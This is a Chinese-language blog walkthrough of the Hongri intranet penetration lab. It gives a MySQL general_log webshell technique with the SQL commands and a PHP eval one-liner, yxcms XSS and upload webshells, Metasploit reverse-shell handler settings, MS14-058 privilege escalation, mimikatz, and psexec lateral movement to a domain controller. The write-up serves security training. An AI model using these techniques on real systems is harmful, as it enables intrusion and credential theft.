内网渗透红日靶场1

依旧开新坑，依旧不填老坑，老坑不填真的好啊

关于多层服务器渗透，我其实只会跟着老师做，很多flag我都没找出来，所以我打算一点点把flag全部做出来，应该有10个flag吧，是一个综合的内网渗透流程，可以学到很多东西。

ok发现等我想回来做寒假的nacos的时候已经不行了，没有对应的ovpn无法去访问。

不过问题不大，我去做红日靶场来提升一下，因为自己在打攻防渗透的时候区的要死，想要锻炼一下实力，那么多工具我都还用不明白其实。

1.红日靶场安装

这个我没截图做，先空着

2.外网打点

2.1信息收集

2.1.1存活靶机探测

由于这只是个虚假的靶场，没有什么公司网站可以收集等等，所以就直接主动信息收集了。

在kali中扫描找到目标主机，用arp-scan -l和netdiscover -r 192.*.*.0/24都可以获取

2.1.2端口扫描

nmap扫描端口，nmap -p- -sV -T4 192.168.160.136

发现开放的三个端口，直接访问网址是一个phpstudy探针

2.1.3敏感路径探测

然后diresearch和御剑进行扫描探测~~（御剑结果忘记截图了）~~

发现phpadmin登录界面

然后是烂大街的弱密码root/root.jpg，而我在做攻防的时候一般到这里就没招了，只能快乐的在外网酷酷摸鱼，没有大佬给我机会让我去内网试试（哭

2.2漏洞利用

其实这里有很多的漏洞，不只有这一个，应该有很多别的方式可以打，我就选一个比较简单的方式打进来，别的漏洞我也会去尝试的，做完以后也会写进来。

2.2.1 数据库日志漏洞

漏洞详解

数据库日志漏洞其实很简单，就是开启数据库日志后，修改一下日志保存的位置，保存到已知的位置，比如"C:/phpStudy/WWW/shell.php",然后执行select "<?php eval($_POST['a'])?>",此时就会把一句话木马写到shell.php中，此时就成功上传木马了。

具体流程

先查询数据库的log是否开启，发现并未开启 show global variables like '%general%';

尝试执行sql语句开启日志 set global general_log='on'; //⽇志保存状态开启；

然后去设置日志保存路径 set global general_log_file ="C:/phpStudy/WWW/shell.php"

这里我没截图，就只贴代码了

然后打开蚁剑连接，成功连入

2.2.2备份文件下载

御剑扫描结果发现rar备份文件

下载备份文件

能看到其中的一些数据库操作

2.2.3 yxcms 留言本 XSS 存储型漏洞

在yxcms网站下含有xss漏洞

然后登录后台，发现执行存储型xss

2.2.4yxcms 后台文件上传漏洞

在yxcms的后台中，含有一个新建php文件的地方

这里可以直接新建一个一句话木马。

但是最大的问题其实是不知道这个shell.php位于网站的哪个目录下，这里获取目录通过之前下载的源码备份

找到路径名称，然后蚁剑连接，连接成功。

3.内网渗透

this is重头戏，之前攻防都没打进内网，更别说什么权提和横向移动了，我这个水平也就欺负欺负靶场了，甚至还没欺负明白。

3.1 C2上线

由于蚁剑成功连接了，所以直接启动使用C2去生成大木马

3.1.1 创建监听器

注意这里的监听器监听的是你kali攻击机的ip，端口随便填

3.1.2生成木马上传

然后生成木马，选择刚刚生成的监听器

把生成木马exe通过蚁剑上传

然后在蚁剑中打开命令行，执行sql.exe，然后成功C2成功上线

3.2权限提升（MSF MS14-058提权漏洞）

这里截图是system权限了，但是其实我根本没提权操作的，上传木马以后直接拿下了system权限，稍微研究了一下发现是C2生成的木马有自动的提权功能，上传了就是system了，因为这个靶场很简单，所以我用MSF生成一个基础的木马去获得一个低权限。

为了练习权限提升，我看了一眼ps全都是system和Administrator的权限的程序，我就用Administrator的权限演示一下提升到system权限。

先从C2转发对话到MSF，创建监听器，选择Foreign HTTP，然后host选攻击机，端口自己填，不要和kali中已经被使用的端口重合。

然后右键已经上线的监听器，然后权限提升选项，创建新的对话

然后选择刚才创建的监听器，同时打开kali中msfconsole,然后输入

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.160.132
set lport 1145

然后运行监听，注意这里监听建议把C2中上线监听的sleep时间改成一秒，这样容易监听到

右键上线的监听，然后点回连设置修改成1秒，这样等一会msf就监听到了。

我这边自己尝试调整了一下变成管理员，来练习提权操作。

先bg放入后台，然后编号是session8，此时权限为管理员

查询一下ms14_058漏洞

这里我在做的时候payload总是设置有问题导致出现无法匹配x64的问题，问了ai才发现自己payload用错了，该使用的是set payload windows/x64/meterpreter/reverse_tcp

同时再set session 8然后run运行

发现提权成功，然后通过mimikatz获取密码

3.3远程连接

打开rdp远程连接

扫描3389端口发现开放

但是直接用win + r，输入mstsc.exe尝试去连接失败，于是先去把防火墙关闭。

这里我的建议是不要用msf，因为返回的中文字它无法解析，建议用C2中进行执行，这样回显更容易读。

然后win + r，输入mstsc.exe

然后成功登录

3.4 横向移动

3.4.1信息收集

这里信息收集的工具正常一般是要自己上传的，但是这个靶场内win7自带了nmap，那就可以跳过这一步骤，直接使用靶机内部的nmap工具。

先在C2输入shell ipconfig获取已侵入靶机的内网ip地址

利用自带的nmap工具扫描内网活跃主机

发现有4个ip，然后利用net view查询域控服务器，这里net view的结果会直接被C2放到目标列表里，马上下面会讲。

发现OWA为域控主机（被标记为PDC），然后再利用nmap扫描OWA的内网ip

然后发现445端口开放，含有SMB协议

3.4.2 拿下域控

先建立一个监听器，payload选择SMB，然后创建

切换到C2的目标列表，这里会显示你net view的结果。

这里虽然我横向移动已经成功了，但是还是演示一下

选择内网的主机如图中192.168.52.138，这里我截图的时候选错了，应该选还没被入侵的主机，选下面两台主机（这里两台主机都含有SMB端口，都可以拿下），右键，横向移动选psexec，

然后密码选之前已经获取的账号密码，然后监听选择之前创建的监听器，最后session选择已经打下来的那台主机~~（这里这么多是因为我用的不是很熟练，有一大堆这一块）~~，然后点击launch上线，成功横向移动拿下域控。

最后的域图，成功拿下3台主机

3.4.3 psexec原理讲解

PsExec 是 Sysinternals PsTools 工具包中的核心组件，可在远程 Windows 系统上执行命令，常用于域环境或内网的横向移动。其原理是通过 SMB（445端口）和 admin$ 共享，在目标机创建 PSEXESVC 服务执行命令，结束后删除服务，但会留下日志痕迹。

PsExec的注意事项
需要远程系统开启admin共享（默认是开启的），原理是基于IPC共享，目标需要开放445端口和admin
在使用IPC连接目标系统后，不需要输入账户和密码。
在使用PsExec执行远程命令时，会在目标系统中创建一个psexec的服务。命令执行完后，psexec服务将被自动删除。由于创建或删除服务时会产生大量的日志，可以在攻击溯源时通过日志反推攻击流程。
使用PsExec可以直接获得System权限的交互式Shell（前提目标是administrator权限的shell）
在域环境测试时发现，非域用户无法利用内存中的票据使用PsExec功能，只能依靠账号和密码进行传递。

深入了解Psexec与SMBexec - FreeBuf网络安全行业门户